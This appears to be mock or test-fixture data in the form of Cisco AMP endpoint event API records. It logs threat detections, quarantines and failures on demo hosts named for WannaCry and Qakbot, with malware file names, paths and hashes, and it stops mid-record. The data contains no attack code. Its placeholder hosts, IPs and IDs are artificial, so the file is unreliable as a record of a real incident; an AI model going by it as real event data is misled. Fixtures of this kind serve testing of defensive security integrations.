-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt 
Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha25